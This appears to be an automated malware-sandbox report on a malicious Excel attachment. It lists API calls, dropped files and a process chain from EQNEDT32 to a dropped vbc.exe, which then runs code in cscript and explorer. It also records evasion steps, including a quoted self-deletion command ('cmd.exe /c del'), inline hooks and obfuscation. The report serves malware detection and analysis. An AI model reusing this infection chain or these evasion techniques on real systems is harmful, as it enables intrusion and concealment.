Source: C:\Users\Public\vbc.exe	Code function: 5_2_00813A83		5_2_00813A83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0080CBA4		5_2_0080CBA4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00787B00		5_2_00787B00
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0075FBD7		5_2_0075FBD7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007EDBDA		5_2_007EDBDA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0076CD5B		5_2_0076CD5B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00790D3B		5_2_00790D3B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007FFDDD		5_2_007FFDDD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0077EE4C		5_2_0077EE4C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00792E2F		5_2_00792E2F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0078DF7C		5_2_0078DF7C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00770F3F		5_2_00770F3F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007FCFB1		5_2_007FCFB1
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041D856		5_1_0041D856
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00401030		5_1_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041D9F9		5_1_0041D9F9
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041DBBF		5_1_0041DBBF
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041DC1B		5_1_0041DC1B
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041E5C4		5_1_0041E5C4
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00402D88		5_1_00402D88
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00402D90		5_1_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00409E60		5_1_00409E60
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041D7D5		5_1_0041D7D5
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041DF8C		5_1_0041DF8C
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00402FB0		5_1_00402FB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023D1238		7_2_023D1238
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0232E2E9		7_2_0232E2E9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02332305		7_2_02332305
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0237A37B		7_2_0237A37B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02337353		7_2_02337353
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023563DB		7_2_023563DB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0232F3CF		7_2_0232F3CF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0235D005		7_2_0235D005
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0234905A		7_2_0234905A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02333040		7_2_02333040
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0232E0C6		7_2_0232E0C6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023D2622		7_2_023D2622
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02334680		7_2_02334680
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0233E6C1		7_2_0233E6C1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0233C7BC		7_2_0233C7BC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023B579A		7_2_023B579A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023657C3		7_2_023657C3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0236D47D		7_2_0236D47D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02365485		7_2_02365485
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02341489		7_2_02341489
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0233351F		7_2_0233351F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0234C5F0		7_2_0234C5F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023E3A83		7_2_023E3A83
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02357B00		7_2_02357B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023DCBA4		7_2_023DCBA4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023BDBDA		7_2_023BDBDA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0232FBD7		7_2_0232FBD7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0235286D		7_2_0235286D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0233C85C		7_2_0233C85C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023CF8EE		7_2_023CF8EE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023B5955		7_2_023B5955
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023329B2		7_2_023329B2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023D098E		7_2_023D098E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023469FE		7_2_023469FE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02362E2F		7_2_02362E2F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0234EE4C		7_2_0234EE4C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02340F3F		7_2_02340F3F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0235DF7C		7_2_0235DF7C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02360D3B		7_2_02360D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0233CD5B		7_2_0233CD5B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023CFDDD		7_2_023CFDDD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008E5C4		7_2_0008E5C4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008D9F8		7_2_0008D9F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_00072D88		7_2_00072D88
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_00072D90		7_2_00072D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_00079E60		7_2_00079E60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_00072FB0		7_2_00072FB0

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe	Code function: String function: 007A3F92 appears 132 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 007CF970 appears 84 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0075DF5C appears 119 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0075E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 007A373B appears 244 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0041C1E0 appears 38 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0232DF5C appears 112 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0239F970 appears 81 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0232E2A8 appears 38 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 02373F92 appears 108 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0237373B appears 238 times

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041A360 NtCreateFile,		5_2_0041A360
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041A410 NtReadFile,		5_2_0041A410
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041A490 NtClose,		5_2_0041A490
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041A540 NtAllocateVirtualMemory,		5_2_0041A540
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041A45A NtReadFile,		5_2_0041A45A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041A40A NtReadFile,		5_2_0041A40A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00750078 NtResumeThread,LdrInitializeThunk,		5_2_00750078
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00750048 NtProtectVirtualMemory,LdrInitializeThunk,		5_2_00750048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007500C4 NtCreateFile,LdrInitializeThunk,		5_2_007500C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074F900 NtReadFile,LdrInitializeThunk,		5_2_0074F900
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074F9F0 NtClose,LdrInitializeThunk,		5_2_0074F9F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FAE8 NtQueryInformationProcess,LdrInitializeThunk,		5_2_0074FAE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		5_2_0074FAD0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FB68 NtFreeVirtualMemory,LdrInitializeThunk,		5_2_0074FB68
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FBB8 NtQueryInformationToken,LdrInitializeThunk,		5_2_0074FBB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FC60 NtMapViewOfSection,LdrInitializeThunk,		5_2_0074FC60
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FC90 NtUnmapViewOfSection,LdrInitializeThunk,		5_2_0074FC90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FDC0 NtQuerySystemInformation,LdrInitializeThunk,		5_2_0074FDC0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FD8C NtDelayExecution,LdrInitializeThunk,		5_2_0074FD8C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		5_2_0074FED0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FEA0 NtReadVirtualMemory,LdrInitializeThunk,		5_2_0074FEA0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FFB4 NtCreateSection,LdrInitializeThunk,		5_2_0074FFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00750060 NtQuerySection,		5_2_00750060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007510D0 NtOpenProcessToken,		5_2_007510D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00751148 NtOpenThread,		5_2_00751148
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0075010C NtOpenDirectoryObject,		5_2_0075010C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007501D4 NtSetValueKey,		5_2_007501D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007507AC NtCreateMutant,		5_2_007507AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074F8CC NtWaitForSingleObject,		5_2_0074F8CC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00751930 NtSetContextThread,		5_2_00751930
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074F938 NtWriteFile,		5_2_0074F938
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FA50 NtEnumerateValueKey,		5_2_0074FA50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FA20 NtQueryInformationFile,		5_2_0074FA20
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FAB8 NtQueryValueKey,		5_2_0074FAB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FB50 NtCreateKey,		5_2_0074FB50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FBE8 NtQueryVirtualMemory,		5_2_0074FBE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00750C40 NtGetContextThread,		5_2_00750C40
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FC48 NtSetInformationFile,		5_2_0074FC48
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FC30 NtOpenProcess,		5_2_0074FC30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FD5C NtEnumerateKey,		5_2_0074FD5C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00751D80 NtSuspendThread,		5_2_00751D80
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FE24 NtWriteVirtualMemory,		5_2_0074FE24
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FF34 NtQueueApcThread,		5_2_0074FF34
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0074FFFC NtCreateProcessEx,		5_2_0074FFFC
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041A360 NtCreateFile,		5_1_0041A360
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041A410 NtReadFile,		5_1_0041A410
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041A490 NtClose,		5_1_0041A490
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041A540 NtAllocateVirtualMemory,		5_1_0041A540
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041A45A NtReadFile,		5_1_0041A45A
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041A40A NtReadFile,		5_1_0041A40A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023200C4 NtCreateFile,LdrInitializeThunk,		7_2_023200C4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023207AC NtCreateMutant,LdrInitializeThunk,		7_2_023207AC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FAB8 NtQueryValueKey,LdrInitializeThunk,		7_2_0231FAB8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FAE8 NtQueryInformationProcess,LdrInitializeThunk,		7_2_0231FAE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		7_2_0231FAD0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FB68 NtFreeVirtualMemory,LdrInitializeThunk,		7_2_0231FB68
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FB50 NtCreateKey,LdrInitializeThunk,		7_2_0231FB50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FBB8 NtQueryInformationToken,LdrInitializeThunk,		7_2_0231FBB8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231F900 NtReadFile,LdrInitializeThunk,		7_2_0231F900
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231F9F0 NtClose,LdrInitializeThunk,		7_2_0231F9F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		7_2_0231FED0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FFB4 NtCreateSection,LdrInitializeThunk,		7_2_0231FFB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FC60 NtMapViewOfSection,LdrInitializeThunk,		7_2_0231FC60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FD8C NtDelayExecution,LdrInitializeThunk,		7_2_0231FD8C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FDC0 NtQuerySystemInformation,LdrInitializeThunk,		7_2_0231FDC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02320078 NtResumeThread,		7_2_02320078
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02320060 NtQuerySection,		7_2_02320060
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02320048 NtProtectVirtualMemory,		7_2_02320048
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023210D0 NtOpenProcessToken,		7_2_023210D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0232010C NtOpenDirectoryObject,		7_2_0232010C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02321148 NtOpenThread,		7_2_02321148
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_023201D4 NtSetValueKey,		7_2_023201D4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FA20 NtQueryInformationFile,		7_2_0231FA20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FA50 NtEnumerateValueKey,		7_2_0231FA50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FBE8 NtQueryVirtualMemory,		7_2_0231FBE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231F8CC NtWaitForSingleObject,		7_2_0231F8CC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02321930 NtSetContextThread,		7_2_02321930
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231F938 NtWriteFile,		7_2_0231F938
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FE24 NtWriteVirtualMemory,		7_2_0231FE24
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FEA0 NtReadVirtualMemory,		7_2_0231FEA0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FF34 NtQueueApcThread,		7_2_0231FF34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FFFC NtCreateProcessEx,		7_2_0231FFFC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FC30 NtOpenProcess,		7_2_0231FC30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02320C40 NtGetContextThread,		7_2_02320C40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FC48 NtSetInformationFile,		7_2_0231FC48
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FC90 NtUnmapViewOfSection,		7_2_0231FC90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0231FD5C NtEnumerateKey,		7_2_0231FD5C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_02321D80 NtSuspendThread,		7_2_02321D80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008A360 NtCreateFile,		7_2_0008A360
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008A410 NtReadFile,		7_2_0008A410
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008A490 NtClose,		7_2_0008A490
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008A540 NtAllocateVirtualMemory,		7_2_0008A540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008A40A NtReadFile,		7_2_0008A40A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008A45A NtReadFile,		7_2_0008A45A

PE file contains strange resources

Source: .vbc[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Sample is known by Antivirus

Source: New order - C.S.I No. 04183.xlsx	Virustotal: Detection: 36%
Source: New order - C.S.I No. 04183.xlsx	ReversingLabs: Detection: 36%

Reads software policies

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$New order - C.S.I No. 04183.xlsx

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCF01.tmp

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/24@2/3

Contains functionality to instantiate COM classes

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,

4_2_00402012

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Contains functionality to check free disk space

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

4_2_0040411B

Binary contains paths to development resources

Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.459887685.00000000002B0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.495263706.00000000008C0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.460925066.00000000005B0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000007.00000003.494990015.00000000004B0000.00000004.00000001.sdmp, cscript.exe, 00000007.00000002.663624666.0000000002490000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, cscript.exe, 00000007.00000003.495952417.0000000002180000.00000004.00000001.sdmp
Source:	Binary string: cscript.pdbN source: vbc.exe, 00000005.00000002.495021937.00000000004C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.495522303.0000000002360000.00000040.00020000.sdmp
Source:	Binary string: cscript.pdb source: vbc.exe, 00000005.00000002.495021937.00000000004C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.495522303.0000000002360000.00000040.00020000.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_100118D5 push ecx; ret		4_2_100118E8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1000DDB7 push edi; iretd		4_2_1000DDB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040E390 push dword ptr [ecx]; retf		5_2_0040E395
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D4B5 push eax; ret		5_2_0041D508
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00416548 push esi; retf		5_2_0041654C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D56C push eax; ret		5_2_0041D572
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D502 push eax; ret		5_2_0041D508
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D50B push eax; ret		5_2_0041D572
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00413602 push 0000007Eh; retf		5_2_00413605
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0075DFA1 push ecx; ret		5_2_0075DFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0040E390 push dword ptr [ecx]; retf		5_1_0040E395
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041D4B5 push eax; ret		5_1_0041D508
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00416548 push esi; retf		5_1_0041654C
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041D56C push eax; ret		5_1_0041D572
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041D502 push eax; ret		5_1_0041D508
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041D50B push eax; ret		5_1_0041D572
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00413602 push 0000007Eh; retf		5_1_00413605
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0232DFA1 push ecx; ret		7_2_0232DFB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0007E390 push dword ptr [ecx]; retf		7_2_0007E395
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008D4B5 push eax; ret		7_2_0008D508
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008D50B push eax; ret		7_2_0008D572
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008D502 push eax; ret		7_2_0008D508
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_00086548 push esi; retf		7_2_0008654C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_0008D56C push eax; ret		7_2_0008D572
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 7_2_00083602 push 0000007Eh; retf		7_2_00083605

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,

4_2_00405C49

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEF

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
